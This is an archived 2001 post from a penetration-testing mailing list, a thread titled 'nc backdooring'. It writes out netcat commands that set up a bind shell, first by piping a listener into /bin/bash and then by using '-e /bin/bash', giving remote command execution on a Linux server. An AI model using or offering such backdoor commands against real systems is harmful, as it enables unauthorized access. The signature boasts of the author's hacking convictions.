Penetration Testing: Re: [PEN-TEST] nc backdooring

[Cold Fire <coldfire () SHADY ORG>]

On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
> Hi, folks !
>
> In one machine (the server - with root permission)  I typed:
>
> nc -l -p 5050 | /bin/bash
>
> In another machine (the client) I typed:
>
> nc server_ip 5050
>
> With this I could execute any program in the server.
> Both machines are Red Hat Linux.
>
> The question is: How can I can the output of the remote execution back? Is
> there nicer way of doing this with netcat?
Compile netcat with -DGAPING_SECURITY_HOLE then:

nc -v -l -p 5050 -e '/bin/bash' on the server

and

nc -v <ip> 5050 on your box.

Steve

--
'Cold Fire, Britains most notorious hacker' Observer, July 1997
'The most recent conviction was that of [Cold Fire] whose On-line
escapades spanned from hacking into educational sites to more
sinister activities such as tapping into industrial and United
States military sites.' DC Paul Cox, SO6 Scotland Yard CCU